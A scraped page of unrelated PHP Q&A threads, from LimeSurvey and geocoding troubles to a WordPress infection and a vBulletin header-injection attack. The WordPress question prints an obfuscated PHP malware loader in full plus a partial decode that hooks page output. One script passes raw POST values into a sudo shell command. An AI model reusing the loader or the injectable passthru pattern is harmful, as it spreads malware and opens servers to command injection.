Yii::app()->lang doesn't work sometimes with LimeSurvey - php
I am working on a custom script to automatically send out invites and reminders. I have everything working fine up until a point. My function to send invites looks like this:
function sendInvites($iSurveyID) {
$oSurvey = Survey::model()->findByPk($iSurveyID);
if (!isset($oSurvey)) {
die("could not load survey");
}
if(!tableExists("{{tokens_$iSurveyID}}")) {
die("survey has no tokens or something");
}
$SQLemailstatuscondition = "emailstatus = 'OK'";
$SQLremindercountcondition = '';
$SQLreminderdelaycondition = '';
$iMaxEmails = (int)Yii::app()->getConfig("maxemails");
$iMaxReminders = 1;
if(!is_null($iMaxReminders)) {
$SQLremindercountcondition = "remindercount < " . $iMaxReminders;
}
$oTokens = Tokens_dynamic::model($iSurveyID);
$aResultTokens = $oTokens->findUninvited(false, $iMaxEmails, true, $SQLemailstatuscondition, $SQLremindercountcondition, $SQLreminderdelaycondition);
if (empty($aResultTokens)) {
die("No tokens to send invites to");
}
$aResult = emailTokens($iSurveyID, $aResultTokens, 'invite');
}
I also have a simple little file that starts up Yii:
Yii::createApplication('LSYii_Application', APPPATH . 'config/config' . EXT);
Yii::app()->loadHelper('admin/token');
Yii::app()->loadHelper('common');
Everything works as expected up until I actually try to send emails to the tokens. I've tracked the problem down to the following, on of the functions called by emailTokens has this in it:
$clang = Yii::app()->lang;
$aBasicTokenFields=array('firstname'=>array(
'description'=>$clang->gT('First name'),
'mandatory'=>'N',
'showregister'=>'Y'
),
The Yii::app()->lang part seems to be causing issues because then php is unable to call the gT method. However, when LimeSurvey is running "properly" this never happens. I can't even seem to find where "lang" is in the LimeSurvey source.
What can I do to make it work?
Why do you make it so hard on yourself and not use the RemoteControl2 API ?
See http://manual.limesurvey.org/wiki/RemoteControl_2_API#invite_participants
On that page you will also find a PHP example script.
maybe
Yii::import('application.libraries.Limesurvey_lang');
$clang = new Limesurvey_lang($oTokens->language);
Related
Does Google Geocode work for anyone in 2018 is there an alternative?
Google Geocode use to work for me but does not anymore. Everything I've tried returns false. It doesn't even give a clue as to why. I've tried changing the API key, I've tried different methods to connect (I prefer using simplexml_load_file). It does work if I type the URL directly into the a browser window but not from my website or even from my localhost. Does anyone have suggestions on what to try next or an alternative to Googles Geocode service?
Here is some code that I've been using that Json / XML results.
//URL SAVE ADDRESS
date_default_timezone_set("America/Chicago");
$address = "1600 Amphitheatre Parkway, Mountain View, CA 94043";
$address = urlencode($address);
// GOOGLE URL
$url = "https://maps.googleapis.com/maps/api/geocode/xml?address=". $address ."&sensor=false&key=AIzaSyDrGe_qr4ofea8WhZFhnPGsXNQtTiQwGhw";
echo $url; //TEMP
$xml = simplexml_load_file($url) OR $ex['tblx'] = "Unable to load XML from Googleapis.";
if(empty($xml)) {
$ex['tblx'] = "Googleapis return no values.";
} elseif("" == $xml) {
$ex['tblx'] = "Geocode problem with address, revise and retry.";
} elseif("OK" != $xml->status) {
$ex['tblx'] = "Geocode: " . ("ZERO_RESULTS" == $xml->status? "Not Found": substr($xml->status,0,30));
} else{
$dvtby0 = $uca['y0'] = (double)$xml->result->geometry->location->lat; //x
$dvtbx0 = $uca['x0'] = (double)$xml->result->geometry->location->lng;
$dvtby1 = $uca['y1'] = (double)$xml->result->geometry->viewport->southwest->lat; //a
$dvtbx2 = $uca['x1'] = (double)$xml->result->geometry->viewport->southwest->lng;
$dvtbx1 = $uca['x2'] = (double)$xml->result->geometry->viewport->northeast->lng; //b
$dvtby2 = $uca['y2'] = (double)$xml->result->geometry->viewport->northeast->lat;
}//endif
if($ex) {
var_dump($ex);
}
die("did it work?");
geocoder.ca for north america opencage or geocode.xyz for the world pelias as standalone there are lots of options in 2018
The problem here turned out to be the version of PHP. It's really weird and hard to troubleshoot. simplexml_load_file($url) was not returning an object. It wasn't even returning false. The only clue that it was something other that code problem. Upgrade to version 5.6 and it works ok.
ng-view outside of index file
I am building a project for a client who has a php site, there is a file that has "template functions". ...so basically, the person has different HTML pages wrapped inside of PHP functions. I need to build a template inside of this person's weird site and I REALLY want to use AngularJs. So at the top of the file is all this stuff, which not exactly sure what it is doing but basically setting where the site is and what template to use.
My question - I am getting Error: $injector:modulerr
Module Error. My Angularjs code is fine I am pretty sure. I have ng-app, and ng-view..just basic stuff in place. Does anyone know possibilities why I am getting this error? I am thinking it must have something to do with this wacky server/php setup. Also any ideas to make it work?
Inside of the php function that loads the template for the site what looks like a basic HTML file with ng-app on the html tags and and ng-view div.
if(!isset($_SESSION)){ session_start(); }
function setup_path_massage(){
if (substr_count($_SERVER['SERVER_NAME'],".") == 1){
$domref = "www." . $_SERVER['SERVER_NAME'] ; }
else {
$domref = $_SERVER['SERVER_NAME'] ; }
list($host,$domain,$ext) = split("\.",$domref);
$domain .= "." . $ext;
$_SESSION['settings']['domain'] = $domain;
#################
if (isset($_SERVER['SUBDOMAIN_DOCUMENT_ROOT'])){
$orig_path_info = realpath($_SERVER['SUBDOMAIN_DOCUMENT_ROOT']);
$pos = strpos($orig_path_info, '/shop/');
}
else {
$orig_path_info = realpath($_SERVER['DOCUMENT_ROOT']);
$pos = strpos($orig_path_info, '/shop/');
}
$shop_path = substr($orig_path_info, 0, $pos)."/shop/";
$Zend_path = $shop_path . 'Zend/library/';
$version = 'v' . substr($orig_path_info, $pos + 7, strpos($orig_path_info, '/', $pos + 7) - ($pos + 7));
set_include_path($shop_path.$version.'/:'.$Zend_path);
return array ($host,$domain);
}
list($host,$domain) = setup_path_massage();
Ok, I was just spazzing out. ...I forgot to attach angular-routes.js and was trying to set up routes.
php: shellscript running before screen-output
I'm currently putting together a small web-based GUI to generate kickstart-scripts. I got a confirmation page that's sending the relevant data via POST to the PHP-page where the actual shell script is called to build the iso. So far it's working, but the page seems to execute the script before it outputs anything else (for example, the 'echo' I put in at the beginning of the page ...), and I'm absolutely clueless why. Would anyone care to enlighten me?
Here's the code to the PHP-page that's executing the shell script ...
echo 'Generating your ISO; this might take a while...';
sleep(20);
if (!isset($_POST['auth'])) {
$ad = 'N';
}
else {
$ad = 'Y';
}
if (!isset($_POST['oracle'])) {
$oracle = 'N';
}
else {
$oracle = 'Y';
}
if ((!isset($_POST['ip'])) or (!isset($_POST['hostname'])) or (!isset($_POST['rhsel'])) or (!isset($_POST['submit'])) or (!isset($_POST['gw'])) or (!isset($_POST['nm']))) {
die('Please use the correct form !');
}
if (isset($_POST['ip'])) {
$ip = trim($_POST['ip']);
}
if (isset($_POST['gw'])) {
$gw = trim($_POST['gw']);
}
if (isset($_POST['nm'])) {
$nm = trim($_POST['nm']);
}
if (isset($_POST['hostname'])) {
$hostname = trim($_POST['hostname']);
}
if (isset($_POST['rhsel'])) {
$rhsel = $_POST['rhsel'];
}
passthru("/usr/bin/sudo /data/skripte/webconfig.sh $rhsel $oracle $ad $ip $gw $nm $hostname 2>&1");
PHP scripts accessed via a browser are request-response, meaning all processing is done on the server prior to headers and content being sent to the client. This means you will not get a continually updating output like you would see on the command line. There is no way around this. Sorry.
wordpress are injected some code snippets
I found all of php files of my wordpress are injected some code snippets in front of the files.
<?php
$ipdcnbaium = '5c%x78256<^#zsfvr#%x5c%x785cq7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz]y74]273]y76]252]y85]256]y6g]257]78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWt%x7860gvodujpo)##-!#~<#%x5c%x77825)}.;%x5c%x7860UQPc%x787f!>>%x5c%x7822!pd%x5c%x7825m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x782x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x5tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%c%x7825j=tj{fpg)%x5c%x7825%4]y76#<%x5c%x7825tmw!>!#]y84]275]y824*<!%x5c%x7824-%x5c%x7824gx7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x786GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%{hnpd!opjudovg!|!**#j{hnpd#)tutjyf)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x78275hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbc%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x773:8297f:5297e:56-%x5c%x7878r.985:52985-t.9%x5c%x7860opjudovg%x5c%x7822)!gj}x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c83]273]y76]277#<%x5c%x7825t2w>#%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%xY%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset($GLc%x7824]y8%x5c%x7824-%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwx782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)#57]38y]47]67y]37]88y]27]5c%x7825))!gj!<*#cd2bge56,47R57,27R66,#%x5c%x782fq%x5c%x7825>ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x782582f%x5c%x7825%x5c%x7825c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI2]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#76248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]uhofm%x5c%x7825:-5ppdex7825!<*#}_;#)323ldfid>}&;%x5c%x7825:osvufs:~92x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>hIr%x5c%x785c1^-%x5c%x7825r%xc%x7825r%x5c%x7878<~!!%x5c%x7825c%x785c2^-%x5c%x7826*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<1]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7828257-MSV,6<*)ujojR%x5c%x7827id%x5ck#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]27{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825opmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j2f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]27%x7825s:%x5c%x785c%x5c%x78#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|9]78]K5]53]Kc#<%x5c%x7825tpz!>-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-E%x5c%x78257%x5c%x782f7###7%x5c%x782f7^x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GOy3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5"%x61%156%x75%156%x61"]=1x5c%x7827pd%x5c%x78256<pdx5c%x7825-#+I#)q%x5cy33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]6225kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfeb8>>%x5c%x7822:ftmbg39*565c%x7827{**u%x5c%x7825-#jt0t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%5z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wc%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zeUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7828y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%; function fjfgg($n){return chr(ord($n)-]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", 860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%25!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x782!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x782%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x77jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5cfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd5tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5825w6Z6<.5%x5c%x7860hA%x5c%x7827ppn)%x5c%x7825epnbss-%x5c%x7825r%x5c%25j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:}Z;0]=]0#)2q%x5c%x7825l}S;2-u#iubq#%x5c%x785cq%x5c%x7821);} #error_reporting(0); preg_replacex78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]OBALS["%x61%156%x75%156%x61"])))) { $GLOBALS[5s:N}#-%x5c%x7825o:W%x5c%x78257825)sutcvt)esp>hmg%x5c%x7825!<5%x5c%x7827jsv%x5c%x81]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7860%x5c%x7825}X;!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%xx5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7x7825!)!gj!<2,*j%x5c%x7825!-#1]#-b4-%x5c%x7824!>!fyqmpef5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9e!-#jt0*?]+^?]_%x5c%x785c}:4:|:**#ppde#)tutjyf%x5c%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)f%x5c%x7825ggg!>!#]y81]273]y8pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*bepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y#-#L#-#M#-#[#-#Y#-#D#-#W7824-%x5c%x7824-tusqpt)%x5c%x78b!-#}#)fepmqnj!%x5c%x782f!#0#)id!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7812>j%x5c%x7825!|!*#91y]825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5825)!>>%x5c%x7822!ftmbg)!gj<*#Y%x5c%x78257;utpI#7>%x}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[7860%x5c%x7878%x5c%x7822l:!}V;3q%x5%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x!osvufs}%x5c%x787f;!opjudovg}k~~9{d1^W%x5c%x7825c!>!%x5c%x7825i%xjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssNULL); })!gj}Z;h!opjudovg}{;274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uy5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x0FUPNFS&d_SFSFGFS%x5c%x7860Q#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc9y]g2y]#>>*4-1-bubE{h%x5]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]3!osvufs!*!+A!>!{e%x5c%x725j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5cMSVD!-id%x5c%x7825)uqpuft%x5c%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x517,67R37,#%x5c%x782fq%x5c%x7825>U<#1Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%xx7878W~!Ypp2)%x5c%x7825zBz-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825%x5c%x7825tww**WYsboepn)%x5c%x7825b%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboe)sutcvt)fubmgoj{hA!osvuf439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:i)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x70LDPT7-UFOJ%x5c%x7860g:74985-rr.93e:5597f-s.9c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7Rc%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]2X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%165]y83]248]y83]256]y81]265]y72]25#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7878256<C>^#zsfvr#%x5c%x785cq%xps)%x5c%x7825j>1<%x56]234]342]58]24]31#-%x5c%x7825tdd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7z*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x52q%x5c%x7825<#g6R85,67R37,5:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]47ubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&SA:>:8:|:7#6#)tutjyf%x5c%x7860Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c4-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786y86]267]y74]275]y7:]268]y7f#<!%x5c%x782827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc)#]341]88M4P8]37]278]2254l}%x5c%x7827;%x5c%7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7pc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x%x78256<%x5c%x787fw6*%x5c%xCW&)7gj6<.[A%x5c%x7827&6<%x5c%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%xubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787ss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K6+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&%x787fw6<*K)ftpmdXA6|7**197-2qj%x5R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-s!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%fu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827kc:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-0%x28%42%x66%152%x66%147%x67%42/(.*)/epreg_replacecawmpmsvdd';
$iizkegwpep = explode(chr((159-115)),'1520,70,4940,45,3179,25,3857,40,4841,38,5381,48,8214,69,10075,31,7231,69,5872,44,3141,38,4381,51,4674,33,8438,39,3937,61,3204,25,4579,41,5676,38,1174,44,8968,49,8136,37,2916,51,4879,61,6505,22,1866,44,4432,50,9786,34,8859,70,7771,21,825,67,5429,44,2526,68,0,29,3033,38,4815,26,5046,20,8357,29,5636,40,926,56,1421,59,2219,40,5916,45,6103,41,6903,42,171,47,4482,37,9820,51,7715,56,2323,34,9299,27,5333,48,9326,29,676,63,7381,63,1480,40,248,21,7202,29,8527,43,7816,63,269,33,6780,20,2768,68,1804,40,7598,24,9871,52,5580,34,8637,38,5194,35,9355,65,4121,51,2403,39,557,68,6945,53,5015,31,6412,23,7056,24,8173,41,892,34,1261,33,8068,68,3071,70,4620,54,1116,58,2090,49,6034,69,9420,43,9463,69,5831,41,1612,68,6729,43,6247,32,9532,55,5988,46,1743,24,9723,63,789,36,6998,28,3758,49,3998,60,9017,67,6853,50,9923,68,7300,45,5174,20,3596,48,1680,38,9144,20,2043,26,6664,35,2069,21,3452,24,8736,29,7622,56,2021,22,5805,26,126,45,2483,43,7139,24,6475,30,2357,46,8675,61,7879,69,7345,36,1767,37,8570,26,3404,48,5473,47,6570,35,3711,47,9229,70,3476,27,4786,29,1048,68,5779,26,8018,50,6800,53,2442,41,8283,32,495,34,1329,31,93,33,8929,39,4519,60,2866,50,1718,25,3807,50,3229,20,4344,37,302,69,8596,41,1910,63,625,51,3503,53,5229,51,2704,38,2259,64,8798,61,4228,59,6605,59,6216,31,5520,60,6435,40,1590,22,371,56,9164,65,529,28,8386,20,468,27,1294,35,218,30,1844,22,5614,22,7678,37,6144,48,4287,57,5280,53,6699,30,9084,37,7543,55,4707,36,7444,25,2967,66,7469,39,2139,29,2199,20,982,66,7508,35,9587,68,7792,24,1218,43,3556,40,9655,68,2836,30,6279,63,4058,63,427,41,5714,65,6527,43,1360,61,29,64,9121,23,7080,59,5066,64,8406,32,8477,50,4172,56,2168,31,4985,30,9991,34,2594,70,6342,70,7163,39,2742,26,4743,43,8765,33,739,50,2664,40,3644,67,3338,66,10025,50,7026,30,6192,24,8315,42,3305,33,5961,27,5130,44,7948,70,1973,48,3249,56,3897,40,6772,8');
$emohrydhhi=substr($ipdcnbaium,(43064-32958),(46-39));
if (!function_exists('efccfhrtgn')) {
function efccfhrtgn($lvbeusmjag, $likewwohuf) {
$bofyjhslnr = NULL;
for($wymmotluwp=0;$wymmotluwp<(sizeof($lvbeusmjag)/2);$wymmotluwp++) {
$bofyjhslnr .= substr($likewwohuf, $lvbeusmjag[($wymmotluwp*2)],$lvbeusmjag[($wymmotluwp*2)+1]);
} return $bofyjhslnr;
};
}
$anjiklzunk="\x20\57\x2a\40\x67\166\x66\162\x70\151\x78\145\x74\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x31\55\x37\64\x29\51\x2c\40\x63\150\x72\50\x28\62\x38\70\x2d\61\x39\66\x29\51\x2c\40\x65\146\x63\143\x66\150\x72\164\x67\156\x28\44\x69\151\x7a\153\x65\147\x77\160\x65\160\x2c\44\x69\160\x64\143\x6e\142\x61\151\x75\155\x29\51\x29\73\x20\57\x2a\40\x78\147\x76\157\x66\163\x6b\147\x6f\146\x20\52\x2f\40";
$xmtobffgzh=substr($ipdcnbaium,(35930-25817),(80-68));
$xmtobffgzh($emohrydhhi, $anjiklzunk, NULL);
$xmtobffgzh=$anjiklzunk;
$xmtobffgzh=(818-697);
$ipdcnbaium=$xmtobffgzh-1; ?>
it seems like some encrypted php codes. So I tried decrypted it Here, then I got
<?php
function __lambda_func()
{
};
if (!function_exists("pa22")) {
function pa22($v)
{
Header("Content-Encoding: none");
$p = "\x70\162\x65\147\x5f";
$p1 = $p . "\155\x61\164\x63\150";
$p2 = $p . "\162\x65\160\x6c\141\x63\145";
$t = dcoo($v);
if ($p1("/\<\/body/si", $t)) {
return $p2("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
if ($p1("/\<\/html/si", $t)) {
return $p2("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
return $t;
}
}
}
}
ob_start("pa22"); //}
I had reinstalled my wordpress several months ago. But it comes again now. My wordpress is the newest version(3.9.1).
my question is
how did those snippets inject into php files?
what are the snippets going to do?
Its seems like a 3rd party injunction. This kinds of attacks are common in wordpress. Please take some security measures after cleaning the inject codes. Disable the edit permission and use some security plugins like file file-monitor-plus and wordfence
Definitely a hack attempt. Probably not targeted to your own site, but you should clear all these things, since they may quickly eat up your hosting resources (CPU, Memory,IO). My advice is after clearing them, disable WP's ability to edit files through the dashboard and set permissions to critical files (config, index etc) to something like 0400 or 0440. The way they get there varies, but in most cases the guy who did this used some known PHP (or other) exploit, which your webhost has not patched yet...
HTTP-SOVIET and HTTP-PACK?
I found a couple vBulletin sites I administer getting hacked recently. They use the latest version of the 3.8 series (3.8.7 Patch Level 2). I am usually pretty good at finding the holes where they get in and patching them up, but this one is stumping me. They are injecting data into the MySQL tables. The attack always happens when they make a GET request to the faq.php script. I was able to save data when the attack occurs. This was the $_REQUEST, $_GET, $_POST, $_COOKIE, and $_SERVER arrays. The only thing I saw that looked out of place is that there were two new $_SERVER keys, HTTP_SOVIET and HTTP_PACK: http://pastebin.com/b6WdZtfK I have to assume this is the root of the issue, but I cannot for the life of me figure out how the attacker can set this variable. There is nothing in the request string, nothing in the cookie array, it is a GET request, not POST. Any idea?
A variable like $_SERVER['HTTP_*'] can set by just adding headers to the HTTP request.
A simple command line example would be:
PHP Page:
print_r($_SERVER);
Then on command line:
curl --header "SOVIET: 123" localhost
You'll see that $_SERVER['HTTP_SOVIET'] is equal to 123.
In this case, the contents of HTTP_SOVIET are base64 encoded (give away, it ends in ==).
Unencoded, it turns into:
function iai() {
global $db;
